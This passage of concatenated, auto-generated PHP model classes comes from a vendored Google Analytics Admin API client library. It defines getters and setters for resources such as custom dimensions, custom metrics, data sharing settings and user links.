} /** * @param string */ public function setResource($resource) { $this->resource = $resource; } /** * @return string */ public function getResource() { return $this->resource; } /** * @param GoogleAnalyticsAdminV1alphaChangeHistoryChangeChangeHistoryResource */ public function setResourceAfterChange(\Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1alphaChangeHistoryChangeChangeHistoryResource $resourceAfterChange) { $this->resourceAfterChange = $resourceAfterChange; } /** * @return GoogleAnalyticsAdminV1alphaChangeHistoryChangeChangeHistoryResource */ public function getResourceAfterChange() { return $this->resourceAfterChange; } /** * @param GoogleAnalyticsAdminV1alphaChangeHistoryChangeChangeHistoryResource */ public function setResourceBeforeChange(\Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1alphaChangeHistoryChangeChangeHistoryResource $resourceBeforeChange) { $this->resourceBeforeChange = $resourceBeforeChange; } /** * @return GoogleAnalyticsAdminV1alphaChangeHistoryChangeChangeHistoryResource */ public function getResourceBeforeChange() { return $this->resourceBeforeChange; } } // Adding a class alias for backwards compatibility with the previous class name. \class_alias(\Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1alphaChangeHistoryChange::class, 'Google\\Site_Kit_Dependencies\\Google_Service_GoogleAnalyticsAdmin_GoogleAnalyticsAdminV1alphaChangeHistoryChange'); <?php /* * Copyright 2014 Google Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); you may not * use this file except in compliance with the License. You may obtain a copy of * the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, WITHOUT * WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the * License for the specific language governing permissions and limitations under * the License. */ namespace Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin; class GoogleAnalyticsAdminV1alphaDeleteUserLinkRequest extends \Google\Site_Kit_Dependencies\Google\Model { /** * @var string */ public $name; /** * @param string */ public function setName($name) { $this->name = $name; } /** * @return string */ public function getName() { return $this->name; } } // Adding a class alias for backwards compatibility with the previous class name. \class_alias(\Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1alphaDeleteUserLinkRequest::class, 'Google\\Site_Kit_Dependencies\\Google_Service_GoogleAnalyticsAdmin_GoogleAnalyticsAdminV1alphaDeleteUserLinkRequest'); <?php /* * Copyright 2014 Google Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); you may not * use this file except in compliance with the License. You may obtain a copy of * the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, WITHOUT * WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the * License for the specific language governing permissions and limitations under * the License. */ namespace Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin; class GoogleAnalyticsAdminV1alphaChangeHistoryChangeChangeHistoryResource extends \Google\Site_Kit_Dependencies\Google\Model { protected $accountType = \Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1alphaAccount::class; protected $accountDataType = ''; protected $attributionSettingsType = \Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1alphaAttributionSettings::class; protected $attributionSettingsDataType = ''; protected $conversionEventType = \Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1alphaConversionEvent::class; protected $conversionEventDataType = ''; protected $customDimensionType = \Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1alphaCustomDimension::class; protected $customDimensionDataType = ''; protected $customMetricType = \Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1alphaCustomMetric::class; protected $customMetricDataType = ''; protected $dataRetentionSettingsType = \Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1alphaDataRetentionSettings::class; protected $dataRetentionSettingsDataType = ''; protected $dataStreamType = \Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1alphaDataStream::class; protected $dataStreamDataType = ''; protected $displayVideo360AdvertiserLinkType = \Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1alphaDisplayVideo360AdvertiserLink::class; protected $displayVideo360AdvertiserLinkDataType = ''; protected $displayVideo360AdvertiserLinkProposalType = \Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1alphaDisplayVideo360AdvertiserLinkProposal::class; protected $displayVideo360AdvertiserLinkProposalDataType = ''; protected $expandedDataSetType = \Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1alphaExpandedDataSet::class; protected $expandedDataSetDataType = ''; protected $firebaseLinkType = \Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1alphaFirebaseLink::class; protected $firebaseLinkDataType = ''; protected $googleAdsLinkType = \Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1alphaGoogleAdsLink::class; protected $googleAdsLinkDataType = ''; protected $googleSignalsSettingsType = \Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1alphaGoogleSignalsSettings::class; protected $googleSignalsSettingsDataType = ''; protected $measurementProtocolSecretType = \Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1alphaMeasurementProtocolSecret::class; protected $measurementProtocolSecretDataType = ''; protected $propertyType = \Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1alphaProperty::class; protected $propertyDataType = ''; protected $searchAds360LinkType = \Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1alphaSearchAds360Link::class; protected $searchAds360LinkDataType = ''; /** * @param GoogleAnalyticsAdminV1alphaAccount */ public function setAccount(\Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1alphaAccount $account) { $this->account = $account; } /** * @return GoogleAnalyticsAdminV1alphaAccount */ public function getAccount() { return $this->account; } /** * @param GoogleAnalyticsAdminV1alphaAttributionSettings */ public function setAttributionSettings(\Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1alphaAttributionSettings $attributionSettings) { $this->attributionSettings = $attributionSettings; } /** * @return GoogleAnalyticsAdminV1alphaAttributionSettings */ public function getAttributionSettings() { return $this->attributionSettings; } /** * @param GoogleAnalyticsAdminV1alphaConversionEvent */ public function setConversionEvent(\Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1alphaConversionEvent $conversionEvent) { $this->conversionEvent = $conversionEvent; } /** * @return GoogleAnalyticsAdminV1alphaConversionEvent */ public function getConversionEvent() { return $this->conversionEvent; } /** * @param GoogleAnalyticsAdminV1alphaCustomDimension */ public function setCustomDimension(\Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1alphaCustomDimension $customDimension) { $this->customDimension = $customDimension; } /** * @return GoogleAnalyticsAdminV1alphaCustomDimension */ public function getCustomDimension() { return $this->customDimension; } /** * @param GoogleAnalyticsAdminV1alphaCustomMetric */ public function setCustomMetric(\Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1alphaCustomMetric $customMetric) { $this->customMetric = $customMetric; } /** * @return GoogleAnalyticsAdminV1alphaCustomMetric */ public function getCustomMetric() { return $this->customMetric; } /** * @param GoogleAnalyticsAdminV1alphaDataRetentionSettings */ public function setDataRetentionSettings(\Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1alphaDataRetentionSettings $dataRetentionSettings) { $this->dataRetentionSettings = $dataRetentionSettings; } /** * @return GoogleAnalyticsAdminV1alphaDataRetentionSettings */ public function getDataRetentionSettings() { return $this->dataRetentionSettings; } /** * @param GoogleAnalyticsAdminV1alphaDataStream */ public function setDataStream(\Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1alphaDataStream $dataStream) { $this->dataStream = $dataStream; } /** * @return GoogleAnalyticsAdminV1alphaDataStream */ public function getDataStream() { return $this->dataStream; } /** * @param GoogleAnalyticsAdminV1alphaDisplayVideo360AdvertiserLink */ public function setDisplayVideo360AdvertiserLink(\Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1alphaDisplayVideo360AdvertiserLink $displayVideo360AdvertiserLink) { $this->displayVideo360AdvertiserLink = $displayVideo360AdvertiserLink; } /** * @return GoogleAnalyticsAdminV1alphaDisplayVideo360AdvertiserLink */ public function getDisplayVideo360AdvertiserLink() { return $this->displayVideo360AdvertiserLink; } /** * @param GoogleAnalyticsAdminV1alphaDisplayVideo360AdvertiserLinkProposal */ public function setDisplayVideo360AdvertiserLinkProposal(\Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1alphaDisplayVideo360AdvertiserLinkProposal $displayVideo360AdvertiserLinkProposal) { $this->displayVideo360AdvertiserLinkProposal = $displayVideo360AdvertiserLinkProposal; } /** * @return GoogleAnalyticsAdminV1alphaDisplayVideo360AdvertiserLinkProposal */ public function getDisplayVideo360AdvertiserLinkProposal() { return $this->displayVideo360AdvertiserLinkProposal; } /** * @param GoogleAnalyticsAdminV1alphaExpandedDataSet */ public function setExpandedDataSet(\Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1alphaExpandedDataSet $expandedDataSet) { $this->expandedDataSet = $expandedDataSet; } /** * @return GoogleAnalyticsAdminV1alphaExpandedDataSet */ public function getExpandedDataSet() { return $this->expandedDataSet; } /** * @param GoogleAnalyticsAdminV1alphaFirebaseLink */ public function setFirebaseLink(\Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1alphaFirebaseLink $firebaseLink) { $this->firebaseLink = $firebaseLink; } /** * @return GoogleAnalyticsAdminV1alphaFirebaseLink */ public function getFirebaseLink() { return $this->firebaseLink; } /** * @param GoogleAnalyticsAdminV1alphaGoogleAdsLink */ public function setGoogleAdsLink(\Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1alphaGoogleAdsLink $googleAdsLink) { $this->googleAdsLink = $googleAdsLink; } /** * @return GoogleAnalyticsAdminV1alphaGoogleAdsLink */ public function getGoogleAdsLink() { return $this->googleAdsLink; } /** * @param GoogleAnalyticsAdminV1alphaGoogleSignalsSettings */ public function setGoogleSignalsSettings(\Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1alphaGoogleSignalsSettings $googleSignalsSettings) { $this->googleSignalsSettings = $googleSignalsSettings; } /** * @return GoogleAnalyticsAdminV1alphaGoogleSignalsSettings */ public function getGoogleSignalsSettings() { return $this->googleSignalsSettings; } /** * @param GoogleAnalyticsAdminV1alphaMeasurementProtocolSecret */ public function setMeasurementProtocolSecret(\Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1alphaMeasurementProtocolSecret $measurementProtocolSecret) { $this->measurementProtocolSecret = $measurementProtocolSecret; } /** * @return GoogleAnalyticsAdminV1alphaMeasurementProtocolSecret */ public function getMeasurementProtocolSecret() { return $this->measurementProtocolSecret; } /** * @param GoogleAnalyticsAdminV1alphaProperty */ public function setProperty(\Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1alphaProperty $property) { $this->property = $property; } /** * @return GoogleAnalyticsAdminV1alphaProperty */ public function getProperty() { return $this->property; } /** * @param GoogleAnalyticsAdminV1alphaSearchAds360Link */ public function setSearchAds360Link(\Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1alphaSearchAds360Link $searchAds360Link) { $this->searchAds360Link = $searchAds360Link; } /** * @return GoogleAnalyticsAdminV1alphaSearchAds360Link */ public function getSearchAds360Link() { return $this->searchAds360Link; } } // Adding a class alias for backwards compatibility with the previous class name. \class_alias(\Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1alphaChangeHistoryChangeChangeHistoryResource::class, 'Google\\Site_Kit_Dependencies\\Google_Service_GoogleAnalyticsAdmin_GoogleAnalyticsAdminV1alphaChangeHistoryChangeChangeHistoryResource'); <?php /* * Copyright 2014 Google Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); you may not * use this file except in compliance with the License. You may obtain a copy of * the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, WITHOUT * WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the * License for the specific language governing permissions and limitations under * the License. */ namespace Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin; class GoogleAnalyticsAdminV1alphaAccessOrderByMetricOrderBy extends \Google\Site_Kit_Dependencies\Google\Model { /** * @var string */ public $metricName; /** * @param string */ public function setMetricName($metricName) { $this->metricName = $metricName; } /** * @return string */ public function getMetricName() { return $this->metricName; } } // Adding a class alias for backwards compatibility with the previous class name. \class_alias(\Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1alphaAccessOrderByMetricOrderBy::class, 'Google\\Site_Kit_Dependencies\\Google_Service_GoogleAnalyticsAdmin_GoogleAnalyticsAdminV1alphaAccessOrderByMetricOrderBy'); <?php /* * Copyright 2014 Google Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); you may not * use this file except in compliance with the License. You may obtain a copy of * the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, WITHOUT * WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the * License for the specific language governing permissions and limitations under * the License. */ namespace Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin; class GoogleAnalyticsAdminV1betaListCustomMetricsResponse extends \Google\Site_Kit_Dependencies\Google\Collection { protected $collection_key = 'customMetrics'; protected $customMetricsType = \Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1betaCustomMetric::class; protected $customMetricsDataType = 'array'; /** * @var string */ public $nextPageToken; /** * @param GoogleAnalyticsAdminV1betaCustomMetric[] */ public function setCustomMetrics($customMetrics) { $this->customMetrics = $customMetrics; } /** * @return GoogleAnalyticsAdminV1betaCustomMetric[] */ public function getCustomMetrics() { return $this->customMetrics; } /** * @param string */ public function setNextPageToken($nextPageToken) { $this->nextPageToken = $nextPageToken; } /** * @return string */ public function getNextPageToken() { return $this->nextPageToken; } } // Adding a class alias for backwards compatibility with the previous class name. \class_alias(\Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1betaListCustomMetricsResponse::class, 'Google\\Site_Kit_Dependencies\\Google_Service_GoogleAnalyticsAdmin_GoogleAnalyticsAdminV1betaListCustomMetricsResponse'); <?php /* * Copyright 2014 Google Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); you may not * use this file except in compliance with the License. You may obtain a copy of * the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, WITHOUT * WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the * License for the specific language governing permissions and limitations under * the License. */ namespace Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin; class GoogleAnalyticsAdminV1alphaAudienceDimensionOrMetricFilterNumericValue extends \Google\Site_Kit_Dependencies\Google\Model { public $doubleValue; /** * @var string */ public $int64Value; public function setDoubleValue($doubleValue) { $this->doubleValue = $doubleValue; } public function getDoubleValue() { return $this->doubleValue; } /** * @param string */ public function setInt64Value($int64Value) { $this->int64Value = $int64Value; } /** * @return string */ public function getInt64Value() { return $this->int64Value; } } // Adding a class alias for backwards compatibility with the previous class name. \class_alias(\Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1alphaAudienceDimensionOrMetricFilterNumericValue::class, 'Google\\Site_Kit_Dependencies\\Google_Service_GoogleAnalyticsAdmin_GoogleAnalyticsAdminV1alphaAudienceDimensionOrMetricFilterNumericValue'); <?php /* * Copyright 2014 Google Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); you may not * use this file except in compliance with the License. You may obtain a copy of * the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, WITHOUT * WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the * License for the specific language governing permissions and limitations under * the License. */ namespace Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin; class GoogleAnalyticsAdminV1betaCustomDimension extends \Google\Site_Kit_Dependencies\Google\Model { /** * @var string */ public $description; /** * @var bool */ public $disallowAdsPersonalization; /** * @var string */ public $displayName; /** * @var string */ public $name; /** * @var string */ public $parameterName; /** * @var string */ public $scope; /** * @param string */ public function setDescription($description) { $this->description = $description; } /** * @return string */ public function getDescription() { return $this->description; } /** * @param bool */ public function setDisallowAdsPersonalization($disallowAdsPersonalization) { $this->disallowAdsPersonalization = $disallowAdsPersonalization; } /** * @return bool */ public function getDisallowAdsPersonalization() { return $this->disallowAdsPersonalization; } /** * @param string */ public function setDisplayName($displayName) { $this->displayName = $displayName; } /** * @return string */ public function getDisplayName() { return $this->displayName; } /** * @param string */ public function setName($name) { $this->name = $name; } /** * @return string */ public function getName() { return $this->name; } /** * @param string */ public function setParameterName($parameterName) { $this->parameterName = $parameterName; } /** * @return string */ public function getParameterName() { return $this->parameterName; } /** * @param string */ public function setScope($scope) { $this->scope = $scope; } /** * @return string */ public function getScope() { return $this->scope; } } // Adding a class alias for backwards compatibility with the previous class name. \class_alias(\Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1betaCustomDimension::class, 'Google\\Site_Kit_Dependencies\\Google_Service_GoogleAnalyticsAdmin_GoogleAnalyticsAdminV1betaCustomDimension'); <?php /* * Copyright 2014 Google Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); you may not * use this file except in compliance with the License. You may obtain a copy of * the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, WITHOUT * WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the * License for the specific language governing permissions and limitations under * the License. */ namespace Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin; class GoogleAnalyticsAdminV1betaAccessFilterExpressionList extends \Google\Site_Kit_Dependencies\Google\Collection { protected $collection_key = 'expressions'; protected $expressionsType = \Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1betaAccessFilterExpression::class; protected $expressionsDataType = 'array'; /** * @param GoogleAnalyticsAdminV1betaAccessFilterExpression[] */ public function setExpressions($expressions) { $this->expressions = $expressions; } /** * @return GoogleAnalyticsAdminV1betaAccessFilterExpression[] */ public function getExpressions() { return $this->expressions; } } // Adding a class alias for backwards compatibility with the previous class name. \class_alias(\Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1betaAccessFilterExpressionList::class, 'Google\\Site_Kit_Dependencies\\Google_Service_GoogleAnalyticsAdmin_GoogleAnalyticsAdminV1betaAccessFilterExpressionList'); <?php /* * Copyright 2014 Google Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); you may not * use this file except in compliance with the License. You may obtain a copy of * the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, WITHOUT * WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the * License for the specific language governing permissions and limitations under * the License. */ namespace Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin; class GoogleAnalyticsAdminV1alphaDataSharingSettings extends \Google\Site_Kit_Dependencies\Google\Model { /** * @var string */ public $name; /** * @var bool */ public $sharingWithGoogleAnySalesEnabled; /** * @var bool */ public $sharingWithGoogleAssignedSalesEnabled; /** * @var bool */ public $sharingWithGoogleProductsEnabled; /** * @var bool */ public $sharingWithGoogleSupportEnabled; /** * @var bool */ public $sharingWithOthersEnabled; /** * @param string */ public function setName($name) { $this->name = $name; } /** * @return string */ public function getName() { return $this->name; } /** * @param bool */ public function setSharingWithGoogleAnySalesEnabled($sharingWithGoogleAnySalesEnabled) { $this->sharingWithGoogleAnySalesEnabled = $sharingWithGoogleAnySalesEnabled; } /** * @return bool */ public function getSharingWithGoogleAnySalesEnabled() { return $this->sharingWithGoogleAnySalesEnabled; } /** * @param bool */ public function setSharingWithGoogleAssignedSalesEnabled($sharingWithGoogleAssignedSalesEnabled) { $this->sharingWithGoogleAssignedSalesEnabled = $sharingWithGoogleAssignedSalesEnabled; } /** * @return bool */ public function getSharingWithGoogleAssignedSalesEnabled() { return $this->sharingWithGoogleAssignedSalesEnabled; } /** * @param bool */ public function setSharingWithGoogleProductsEnabled($sharingWithGoogleProductsEnabled) { $this->sharingWithGoogleProductsEnabled = $sharingWithGoogleProductsEnabled; } /** * @return bool */ public function getSharingWithGoogleProductsEnabled() { return $this->sharingWithGoogleProductsEnabled; } /** * @param bool */ public function setSharingWithGoogleSupportEnabled($sharingWithGoogleSupportEnabled) { $this->sharingWithGoogleSupportEnabled = $sharingWithGoogleSupportEnabled; } /** * @return bool */ public function getSharingWithGoogleSupportEnabled() { return $this->sharingWithGoogleSupportEnabled; } /** * @param bool */ public function setSharingWithOthersEnabled($sharingWithOthersEnabled) { $this->sharingWithOthersEnabled = $sharingWithOthersEnabled; } /** * @return bool */ public function getSharingWithOthersEnabled() { return $this->sharingWithOthersEnabled; } } // Adding a class alias for backwards compatibility with the previous class name. \class_alias(\Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1alphaDataSharingSettings::class, 'Google\\Site_Kit_Dependencies\\Google_Service_GoogleAnalyticsAdmin_GoogleAnalyticsAdminV1alphaDataSharingSettings'); <?php /* * Copyright 2014 Google Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); you may not * use this file except in compliance with the License. You may obtain a copy of * the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, WITHOUT * WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the * License for the specific language governing permissions and limitations under * the License. */ namespace Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin; class GoogleAnalyticsAdminV1alphaCustomMetric extends \Google\Site_Kit_Dependencies\Google\Collection { protected $collection_key = 'restrictedMetricType'; /** * @var string */ public $description; /** * @var string */ public $displayName; /** * @var string */ public $measurementUnit; /** * @var string */ public $name; /** * @var string */ public $parameterName; /** * @var string[] */ public $restrictedMetricType; /** * @var string */ public $scope; /** * @param string */ public function setDescription($description) { $this->description = $description; } /** * @return string */ public function getDescription() { return $this->description; } /** * @param string */ public function setDisplayName($displayName) { $this->displayName = $displayName; } /** * @return string */ public function getDisplayName() { return $this->displayName; } /** * @param string */ public function setMeasurementUnit($measurementUnit) { $this->measurementUnit = $measurementUnit; } /** * @return string */ public function getMeasurementUnit() { return $this->measurementUnit; } /** * @param string */ public function setName($name) { $this->name = $name; } /** * @return string */ public function getName() { return $this->name; } /** * @param string */ public function setParameterName($parameterName) { $this->parameterName = $parameterName; } /** * @return string */ public function getParameterName() { return $this->parameterName; } /** * @param string[] */ public function setRestrictedMetricType($restrictedMetricType) { $this->restrictedMetricType = $restrictedMetricType; } /** * @return string[] */ public function getRestrictedMetricType() { return $this->restrictedMetricType; } /** * @param string */ public function setScope($scope) { $this->scope = $scope; } /** * @return string */ public function getScope() { return $this->scope; } } // Adding a class alias for backwards compatibility with the previous class name. \class_alias(\Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1alphaCustomMetric::class, 'Google\\Site_Kit_Dependencies\\Google_Service_GoogleAnalyticsAdmin_GoogleAnalyticsAdminV1alphaCustomMetric'); <?php /* * Copyright 2014 Google Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); you may not * use this file except in compliance with the License. You may obtain a copy of * the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, WITHOUT * WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the * License for the specific language governing permissions and limitations under * the License. */ namespace Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin; class GoogleAnalyticsAdminV1alphaUserLink extends \Google\Site_Kit_Dependencies\Google\Collection { protected $collection_key = 'directRoles'; /** * @var string[] */ public $directRoles; /** * @var string */ public $emailAddress; /** * @var string */ public $name; /** * @param string[] */ public function setDirectRoles($directRoles) { $this->directRoles = $directRoles; } /** * @return string[] */ public function getDirectRoles() { return $this->directRoles; } /** * @param string */ public function setEmailAddress($emailAddress) { $this->emailAddress = $emailAddress; } /** * @return string */ public function getEmailAddress() { return $this->emailAddress; } /** * @param string */ public function setName($name) { $this->name = $name; } /** * @return string */ public function getName() { return $this->name; } } // Adding a class alias for backwards compatibility with the previous class name. \class_alias(\Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1alphaUserLink::class, 'Google\\Site_Kit_Dependencies\\Google_Service_GoogleAnalyticsAdmin_GoogleAnalyticsAdminV1alphaUserLink'); <?php /* * Copyright 2014 Google Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); you may not * use this file except in compliance with the License. You may obtain a copy of * the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, WITHOUT * WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the * License for the specific language governing permissions and limitations under * the License. */ namespace Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin; class GoogleAnalyticsAdminV1alphaAccessFilterExpressionList extends \Google\Site_Kit_Dependencies\Google\Collection { protected $collection_key = 'expressions'; protected $expressionsType = \Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1alphaAccessFilterExpression::class; protected $expressionsDataType = 'array'; /** * @param GoogleAnalyticsAdminV1alphaAccessFilterExpression[] */ public function setExpressions($expressions) { $this->expressions = $expressions; } /** * @return GoogleAnalyticsAdminV1alphaAccessFilterExpression[] */ public function getExpressions() { return $this->expressions; } } // Adding a class alias for backwards compatibility with the previous class name. \class_alias(\Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1alphaAccessFilterExpressionList::class, 'Google\\Site_Kit_Dependencies\\Google_Service_GoogleAnalyticsAdmin_GoogleAnalyticsAdminV1alphaAccessFilterExpressionList'); <?php /* * Copyright 2014 Google Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); you may not * use this file except in compliance with the License. You may obtain a copy of * the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, WITHOUT * WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the * License for the specific language governing permissions and limitations under * the License. */ namespace Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin; class GoogleAnalyticsAdminV1alphaDisplayVideo360AdvertiserLink extends \Google\Site_Kit_Dependencies\Google\Model { /** * @var bool */ public $adsPersonalizationEnabled; /** * @var string */ public $advertiserDisplayName; /** * @var string */ public $advertiserId; /** * @var bool */ public $campaignDataSharingEnabled; /** * @var bool */ public $costDataSharingEnabled; /** * @var string */ public $name; /** * @param bool */ public function setAdsPersonalizationEnabled($adsPersonalizationEnabled) { $this->adsPersonalizationEnabled = $adsPersonalizationEnabled; } /** * @return bool */ public function getAdsPersonalizationEnabled() { return $this->adsPersonalizationEnabled; } /** * @param string */ public function setAdvertiserDisplayName($advertiserDisplayName) { $this->advertiserDisplayName = $advertiserDisplayName; } /** * @return string */ public function getAdvertiserDisplayName() { return $this->advertiserDisplayName; } /** * @param string */ public function setAdvertiserId($advertiserId) { $this->advertiserId = $advertiserId; } /** * @return string */ public function getAdvertiserId() { return $this->advertiserId; } /** * @param bool */ public function setCampaignDataSharingEnabled($campaignDataSharingEnabled) { $this->campaignDataSharingEnabled = $campaignDataSharingEnabled; } /** * @return bool */ public function getCampaignDataSharingEnabled() { return $this->campaignDataSharingEnabled; } /** * @param bool */ public function setCostDataSharingEnabled($costDataSharingEnabled) { $this->costDataSharingEnabled = $costDataSharingEnabled; } /** * @return bool */ public function getCostDataSharingEnabled() { return $this->costDataSharingEnabled; } /** * @param string */ public function setName($name) { $this->name = $name; } /** * @return string */ public function getName() { return $this->name; } } // Adding a class alias for backwards compatibility with the previous class name. 